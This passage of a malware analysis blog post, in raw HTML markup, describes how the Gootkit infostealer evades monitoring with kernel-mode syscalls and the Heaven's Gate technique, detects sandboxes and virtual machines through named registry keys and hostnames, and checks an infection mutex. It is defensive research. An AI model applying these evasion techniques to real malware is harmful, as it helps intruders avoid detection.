    style=&quot;padding-bottom: 7.03125%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAIAAABR8BlyAAAACXBIWXMAAAsTAAALEwEAmpwYAAAASElEQVR42gE9AML/AO/f8P/09N7W1r25tN7Y0+bX1+7m4/fv6OHi47zR1N/f1PDn5urp4+zs5PTt6PDq5PHo4PLp4fHn3/Pr40cbNTi5xXV/AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit7&quot;
        title=&quot;&quot;
        src=&quot;/website/static/ae227e129d9e3296fd5f96db97af617f/e1031/gootkit7.png&quot;
        srcset=&quot;/website/static/ae227e129d9e3296fd5f96db97af617f/804b2/gootkit7.png 384w,
/website/static/ae227e129d9e3296fd5f96db97af617f/e5715/gootkit7.png 768w,
/website/static/ae227e129d9e3296fd5f96db97af617f/e1031/gootkit7.png 803w&quot;
        sizes=&quot;(max-width: 803px) 100vw, 803px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The result of this check is used to run two different paths of code but with the same scope: run one of the aforementioned missing API calls in the Kernel mode. This means that, in this way, classic user-level monitoring tools would not catch these calls and the RunPE technique would remain unnoticed.&lt;/p&gt;
&lt;p&gt;Specifically, in case the process is running in a 32-bit environment, it would use the SYSENTER command to switch into the Kernel mode, while, on the contrary, it would use the SYSCALL command to perform the same operation.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 695px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/7bb2871fab1ce8bafbbc50f536b75f50/83b75/gootkit8.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 5.208333333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAYAAADeko4lAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAR0lEQVR42mNYv2rZ/707t/x/cPva/1uXL/5/8/zx/48vHv+/9eje//wzJ/5vvHPx/9vnD4Dij1Dwq6cPwBgh9vD/25dP/wMABB1HURNNzcoAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit8&quot;
        title=&quot;&quot;
        src=&quot;/website/static/7bb2871fab1ce8bafbbc50f536b75f50/83b75/gootkit8.png&quot;
        srcset=&quot;/website/static/7bb2871fab1ce8bafbbc50f536b75f50/804b2/gootkit8.png 384w,
/website/static/7bb2871fab1ce8bafbbc50f536b75f50/83b75/gootkit8.png 695w&quot;
        sizes=&quot;(max-width: 695px) 100vw, 695px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 493px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/d9e171bd6135a64e4d5bb2263118e0f8/f88d0/gootkit9.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 7.552083333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAIAAADXZGvcAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAe0lEQVR42kXLMQ7CIBQA0N7d2dHZ3Qt4hJo4SYCkH6lAf8EUUqgxKdYEHH37a+onGSAj73wv37Or26usseRUczxxsuvoHm9CPJ6A3tig7YapVep75xevmpqTkcxx0IQuAf95jWdBD4weST8ONqAtboZhkkosVl6DZhP8AG8calEw0sOMAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit9&quot;
        title=&quot;&quot;
        src=&quot;/website/static/d9e171bd6135a64e4d5bb2263118e0f8/f88d0/gootkit9.png&quot;
        srcset=&quot;/website/static/d9e171bd6135a64e4d5bb2263118e0f8/804b2/gootkit9.png 384w,
/website/static/d9e171bd6135a64e4d5bb2263118e0f8/f88d0/gootkit9.png 493w&quot;
        sizes=&quot;(max-width: 493px) 100vw, 493px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;To complicate even further, the SYSCALL command can’t be called in the context of a 32-bit application. This means that the executable needs to perform a “trick-into-the-trick” to execute this operation. We are talking about a technique known as &lt;em&gt;&lt;strong&gt;The Heaven’s Gate&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Practically, thanks to the RETF instruction, it’s possible to change the code segment (CS) from 0x23 to 0x33, de facto enabling 64-bit mode on the running process.&lt;/p&gt;
&lt;p&gt;In the following image we highlight the entrance and the exit of the “Gate” which contains the 64-bit code that performs the SYSCALL operation.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 834px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/d3068ff695d9459149e796f5ad67e5ca/5d72a/gootkit10.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 84.89583333333333%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAIAAABSJhvpAAAACXBIWXMAAAsTAAALEwEAmpwYAAACL0lEQVR42m1T2ZKqMBSc//+sqftoeWtEZQvIEkggJKwKqOi0ZNTRGh7wYNLp5Zx8JDSO4vh6vaIIg1AIUVU1PlFs1kYUxYvFAnVT10qptu3wvt6fjygCJLyB4zhNWVEUx+MRn6VStmWLXJjbrWXZ2BQEuzRNhSie4BiHU4qKM5YkSbff64Xz+ey6zsy/9oiX0CTY7YIg7Pv+CYZamiSoMp6VZTkMg164XC4eIYWUlmnh/6ossUE7+gPMOQfzC9gjUkrHsotClqpkjDd18wKGZwifZXMYG4bxASauK6UixFVSgpwx1rXdCxieNRj2CiFkWR9/sJPveeA0tybeeKALZ73L1q3K4CnLVFVX49R13b7rtpsNSxnSxrH13KqqrB6+7uCZOeM8DEMcL/J8HEekCkNt2xqGAf1oIZbyLEcBVT9gSm+mUcEScQmliZKq7wfsoJQ2TWOsVr7nQwLCBx4b2qadpkl7Bl+k+xzH8fgrMEiC1P/LZZ6LYeih/HA4vKetJww8mCI9A7e4psn3feSESNDF4pam4DyDo99pY+5uYPw4jouo7syTY9tpkpjm1rasuSkRIeRtPEOMHSrsI8SLZh5YHfp+9fUFL/8+P9fGGqMEIa7j+v7uBaw9A6xUibRgDNpwPbCAxiAkzGZdN1B+OPQ495k2wHS+GMgxy/PH3E/TeblcYiQh3jRN0Aa7wPN9NOXJLNC7XKDCDOImPRbgmaUpeIpCILzT6YRV/X6AvwE5fLbdh4KlgwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit10&quot;
        title=&quot;&quot;
        src=&quot;/website/static/d3068ff695d9459149e796f5ad67e5ca/5d72a/gootkit10.png&quot;
        srcset=&quot;/website/static/d3068ff695d9459149e796f5ad67e5ca/804b2/gootkit10.png 384w,
/website/static/d3068ff695d9459149e796f5ad67e5ca/e5715/gootkit10.png 768w,
/website/static/d3068ff695d9459149e796f5ad67e5ca/5d72a/gootkit10.png 834w&quot;
        sizes=&quot;(max-width: 834px) 100vw, 834px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Instead, in this other image, we can see the process status before opening the gate (grey=suspended process) and after having closed it (orange=running process).&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1162px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/642428a19324031506a9cdc9891b1b5b/84bf8/gootkit11.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 59.63541666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAIAAADtbgqsAAAACXBIWXMAABYlAAAWJQFJUiTwAAACdUlEQVR42g2QyW7TQABA/etwqsSBoApV6gmVBopE6S6KREPTNAlZSpuljfdtZrzMjGc8jp3YzmJ6ebenJz2JJ7HPBJ8vCE+DIBQUC8q4SBiPuRAxpwmnjOJ8ka7LvFikqyIvi0WZZ0VZSJRQy9DHg66hykCXR6bWnN6a2ovpmq5jjhU0syLFiRWXT7VAdWIdJDMzmujEhlSqiqXAQJ8MObALEQCE2pOJa1kOVIHnHbWdetu7UlZHfXLQdE7G6aVc/tQ2h3/p3QRK1SpNmY99e0mCzZLxgBiyiX3EIpiI6NnEvbFtk0JDycQIEF+F6ZYsKhlw2XiVyzSh0HdUgZx1GsUYmPpAED+d4zm2X053h/Ud67ymntYev+yY5zX7ahf92ns6eCPfnb+WFykPPWhh10kYIb7ueaN8LspMMIK6vVajcdW7v2w3O81Gp/Wn0+s8PA4m7bueMlOlKGZ+FEfxHMcJRH5ECMXx6++QMhbHaSaKPMuX6XpdVtvNdrvevrLaVNVmvdlIiSAAWraleY5DfQAdTVGHgQfDEPoemCpwZmDZpIpJpgpSLaK7bGaEU9W3IZaqTSYoDIDOgJXHxFJ6w6cT39IjYOimVm+on26MH4/J8QOvt+DZKL2ara7V6lufN8dIKrKUY4QDh3tumRDLlgfjNkXAD23OSV8NrrsvOt8+B2lfCzRe2FnlLqsnGD9pQFqIjEBXHQ+gIXNkjjzr7LEJNEXxjQw7qHH4fLybtOrhzYF5sc9uP4vW10X3u3uxZ3avpXWeJzSQRw/EgwkNkecZwBVRFAkmiB3+e6+13nmdt0G3Bu8/eO0aG35MRvtBpxbOfv8HE4VynrfKGIAAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit11&quot;
        title=&quot;&quot;
        src=&quot;/website/static/642428a19324031506a9cdc9891b1b5b/84bf8/gootkit11.png&quot;
        srcset=&quot;/website/static/642428a19324031506a9cdc9891b1b5b/804b2/gootkit11.png 384w,
/website/static/642428a19324031506a9cdc9891b1b5b/e5715/gootkit11.png 768w,
/website/static/642428a19324031506a9cdc9891b1b5b/84bf8/gootkit11.png 1162w&quot;
        sizes=&quot;(max-width: 1162px) 100vw, 1162px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Also, Gootkit takes advantage of The Heaven’s Gate as an anti-debugging technique because the majority of commonly used debuggers can’t properly handle this situation, not allowing the analyst to follow the code of the Gate step-by-step.&lt;/p&gt;
&lt;p&gt;For further details, this method was deeply explained in this blog &lt;a href=&quot;https://www.malwarebytes.com/blog/news/2018/01/a-coin-miner-with-a-heavens-gate&quot;&gt;MalwareBytes&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Going back to the point, the first stage resulted more complicated than expected because it pushed over the limits of obfuscation and stealthiness with the combination of various techniques.&lt;/p&gt;
&lt;h1&gt;&lt;strong&gt;5.Stage 2: Gaining a foothold&lt;/strong&gt;&lt;/h1&gt;
&lt;p&gt;At this point we can proceed with the analysis of the unpacked Gootkit.&lt;/p&gt;
&lt;p&gt;The very first considerable finding was the check for the existence of a &lt;em&gt;&lt;strong&gt;mutex&lt;/strong&gt;&lt;/em&gt; object named “ServiceEntryPointThread”. If it exists, the process would terminate itself.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1188px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/b0bd2653d1af5fd8dc1251d584f23d0e/df56e/gootkit12.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 26.822916666666668%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAAAsTAAALEwEAmpwYAAABEklEQVR42g2PSW7CMABFc/8DdNVNb4C6ou2mDBJtGQoqkDiDh8RxbCcmzkgGII309HfvS8/YzGfgsLMOB+xZS3Pzs/rYbl9/nYlgUIa+oEQyP44C17bg6cQgJNCFDsDQiUJi4PNeU5T46NGmpmchNCVoQvjX/Zr1ubjlvNPRUKswgOl284iCtkraTHZF3JXKwM8vajGXlOgILaDp2X/eabqznkL6lgk4WoUgZUIJBAk4N3HYFHGt+bi3OjXI7FPbpg6DruBz7LvBOmVLLt+vhXmv5HBNh+bSFzGnWAtSSTqUaiiSobrcm8yACEQUKUaaPD67DuNuW46veV/mbam66jLS13rs3K+/2fGobDCSAEsE+B+p9wqNOco0JAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit12&quot;
        title=&quot;&quot;
        src=&quot;/website/static/b0bd2653d1af5fd8dc1251d584f23d0e/df56e/gootkit12.png&quot;
        srcset=&quot;/website/static/b0bd2653d1af5fd8dc1251d584f23d0e/804b2/gootkit12.png 384w,
/website/static/b0bd2653d1af5fd8dc1251d584f23d0e/e5715/gootkit12.png 768w,
/website/static/b0bd2653d1af5fd8dc1251d584f23d0e/df56e/gootkit12.png 1188w&quot;
        sizes=&quot;(max-width: 1188px) 100vw, 1188px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;But how mutexes works? Mutexes are used as a locking mechanism to serialize access to a resource on the system. Malware sometimes uses it as an “infection marker” to avoid to infect the same machine twice. The fascinating thing about mutexes is that they are a double-edged weapon: security analysts could install the mutex in advance to vaccinate endpoint. &lt;a href=&quot;https://zeltser.com/malware-vaccination-infection-markers/&quot;&gt;(ref: Zeltser blog)&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This means that this is a great indicator of compromise that we can use not only to detect the infection but also to prevent it.&lt;/p&gt;
&lt;p&gt;Moving on, we found that malware authors implemented a lot of checks to understand if the malware is running inside a virtual environment. Some of them are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It checks if the registry key “HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString” contains the word “Xeon”&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 998px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/ca4b6ae1da6bfde3a1bdd11f023e9cec/350de/gootkit13.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 8.854166666666666%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAIAAADXZGvcAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAgUlEQVR42gXBTQ+CIBgAYP//qf/RrXXoXIc+NsdrDpBMFFlYOIMGzmDaep5kd9lAusWwPmUrro6ipoKgmiB5yxsKgkLLMsGuTQEdp0arqmQVgCrYS8nkniJOeY7Oe3zQWgX79KqMrl/CZ57MPA7B9aPpoh9+X7sE95DcMuwLEqf3Hy4JaLxt27O4AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit13&quot;
        title=&quot;&quot;
        src=&quot;/website/static/ca4b6ae1da6bfde3a1bdd11f023e9cec/350de/gootkit13.png&quot;
        srcset=&quot;/website/static/ca4b6ae1da6bfde3a1bdd11f023e9cec/804b2/gootkit13.png 384w,
/website/static/ca4b6ae1da6bfde3a1bdd11f023e9cec/e5715/gootkit13.png 768w,
/website/static/ca4b6ae1da6bfde3a1bdd11f023e9cec/350de/gootkit13.png 998w&quot;
        sizes=&quot;(max-width: 998px) 100vw, 998px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;it checks if the computer name is “7SILVIA” or “SANDBOX”, if the username is “CurrentUser” or “Sandbox” or if “sbiedll.dll” has been loaded.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 263px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/5c60ee7737fb9e92d2dc55433a98aa95/17741/gootkit14.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 38.78326996197718%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAAAsTAAALEwEAmpwYAAABhElEQVR42m2Ra2+yQBCF+f//ozW01r411ksVAZEVdkXkUrm8InJRsBhrLNbeZLuNSdsPTZ4Pk8yZzJkzlDtRZ7YeTq351JoaSp9pC5070G0PevxuvcAv2+Pzpjg8/gmVhv8flv4mDddJEHmWjgYGkkwFmqqS7zKMD0XxjAn4gIs9Pua/oW4q5Vr1plWvNRt1tn1XoemLs/PL0vn1ZRnJAAKB7zJynxe47hDJ1r0+MbVvKLHHSCKvSH0JCKosdhq1q1KpWS0zrZZtjhHgr2i6ekF3mnXL1LJlkMazNPZPUEngPsQzYjsJvdizdQQGLONo0NZHG9KwxrDHIoGz1eHucfV1xdsOf+QnKN8xQm9CVIFnBbYBBbbxrzIUOiqUVtHUHknGWFEBBzlGG0HAtbPl/Ccw3zVJTtnCTyJvbusK6LH125HIa0jarqLQMYh5Rx2kkR+4966hvj5l5AUnKDK58J11Ml/FHpFqsqgjiQRuDGG+SfBxX7w/4Y89Jm6/irx42X5v/gQ4hJlHOoJt2gAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit14&quot;
        title=&quot;&quot;
        src=&quot;/website/static/5c60ee7737fb9e92d2dc55433a98aa95/17741/gootkit14.png&quot;
        srcset=&quot;/website/static/5c60ee7737fb9e92d2dc55433a98aa95/17741/gootkit14.png 263w&quot;
        sizes=&quot;(max-width: 263px) 100vw, 263px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;it checks if “HKLM\HARDWARE\Description\System\VideoBiosVersion” contains the word “VirtualBox”&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 770px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/936f0f53ff8c2a8ac03e45f86a3e0c45/f4b77/gootkit15.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 20.052083333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA2ElEQVR42i3CyU6DQAAAUD7ck/9hYtKTFy/9BE3UVBu0bB0aBmZlBpiN1pJh00RfXoCLzDTYIGRQNV/16m2VwUMe8RPqSMvKgmo6+947MRo2OfHfsEHzgDHobG0xdjVdvVsnS2OcgLRlxAjRUCJV7S92MGLqxdzLv8ulHc8qgM9PHYg1qlQBB9cs1y5L4C4K+amUiMLiC8lMN+m5LSdbj5Z7Tb3hy7eaBxtsb25fNhuW5yDcH5NPjsHDPtq+7cDrsTzE7+HdR3oPTo+cJFpyLYmW9LcSREn2A+H/1ljRYiSWAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit15&quot;
        title=&quot;&quot;
        src=&quot;/website/static/936f0f53ff8c2a8ac03e45f86a3e0c45/f4b77/gootkit15.png&quot;
        srcset=&quot;/website/static/936f0f53ff8c2a8ac03e45f86a3e0c45/804b2/gootkit15.png 384w,
/website/static/936f0f53ff8c2a8ac03e45f86a3e0c45/e5715/gootkit15.png 768w,
/website/static/936f0f53ff8c2a8ac03e45f86a3e0c45/f4b77/gootkit15.png 770w&quot;
        sizes=&quot;(max-width: 770px) 100vw, 770px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;it checks “HKLM\Software\Microsoft\Windows\CurrentVersion\SystemBiosVersion” for the string “VBOX”&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In the case one of this check fails, the program would execute a Sleep operation in a infinite cycle in the attempt to thwart automated sandbox execution.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 576px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/d462bc80f6d4fc86aa5a9210143e8929/533c1/gootkit16.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 23.4375%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAAAsTAAALEwEAmpwYAAABJklEQVR42hXOS0/CMAAA4P1iLxo9EOPBg49EExP1RIIXiY9ylLuAAZTHtBvtgK5d142tjLEFEAqBGb9f8GnhiPljP0oitUzGlMRDNvfENpXZZjZJZR72dQaI9eA6RUFBjzwTuxSrebbbrZepJhtf7we56t5hqLci2yYD6DsD37ZkSBzBL6ukaxqM4tgRE44IfeUcMBswB4T+t8bq7dLxCTjKWc0PjrBeaSDYhUYLo59hXy/XirVOvg7vEX7smYWOcWqivO92PPdTMFMLRnT035ZqNU0ocSAUBLmeFcc8St0CfDMRIOgppOXAfmnjfTy4VptFtlXrVaKFfEgxdElvOQ0CarkIpdxRUmS/0zDyLtrVCro14DnCV8i8aZpnEN/FC5mpVM3Gf9AP+t9jcrmhAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit16&quot;
        title=&quot;&quot;
        src=&quot;/website/static/d462bc80f6d4fc86aa5a9210143e8929/533c1/gootkit16.png&quot;
        srcset=&quot;/website/static/d462bc80f6d4fc86aa5a9210143e8929/804b2/gootkit16.png 384w,
/website/static/d462bc80f6d4fc86aa5a9210143e8929/533c1/gootkit16.png 576w&quot;
        sizes=&quot;(max-width: 576px) 100vw, 576px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;After that, we encountered the implementation of a particular persistence mechanism that it seems Gootkit has been using for many months: it’s already documented in various blog posts, for ex. ReaQta blog.&lt;/p&gt;
&lt;p&gt;Briefly, the infostealer generates a INF file with the same filename of itself.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1158px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/02a959aecbe33c23c7c6d4087efeca45/1132d/gootkit17.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 8.854166666666666%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAIAAADXZGvcAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAhUlEQVR42gF6AIX/AN3S0NvNz+HZ1Mrd0bTDuNjEvrrNktfhmezm1Orl4+vn4e3n4u3o5OPe3OTg3OTh3ePf3OPe3OXh3eTg3QDz6uXs3d368uzq6djQ0bXk1r3H1Kbh6cT9+Oz89Oz/+O//+vH68+335+T38enu5+Du5t/s5N7w6OHu599p5GjMVBVFLwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;gootkit17&quot;
        title=&quot;&quot;
        src=&quot;/website/static/02a959aecbe33c23c7c6d4087efeca45/1132d/gootkit17.png&quot;
        srcset=&quot;/website/static/02a959aecbe33c23c7c6d4087efeca45/804b2/gootkit17.png 384w,
/website/static/02a959aecbe33c23c7c6d4087efeca45/e5715/gootkit17.png 768w,
/website/static/02a959aecbe33c23c7c6d4087efeca45/1132d/gootkit17.png 1158w&quot;
        sizes=&quot;(max-width: 1158px) 100vw, 1158px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Content of the INF file:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 504px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/facf0759d4faf7986413da479d1a5df4/08115/gootkit18.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
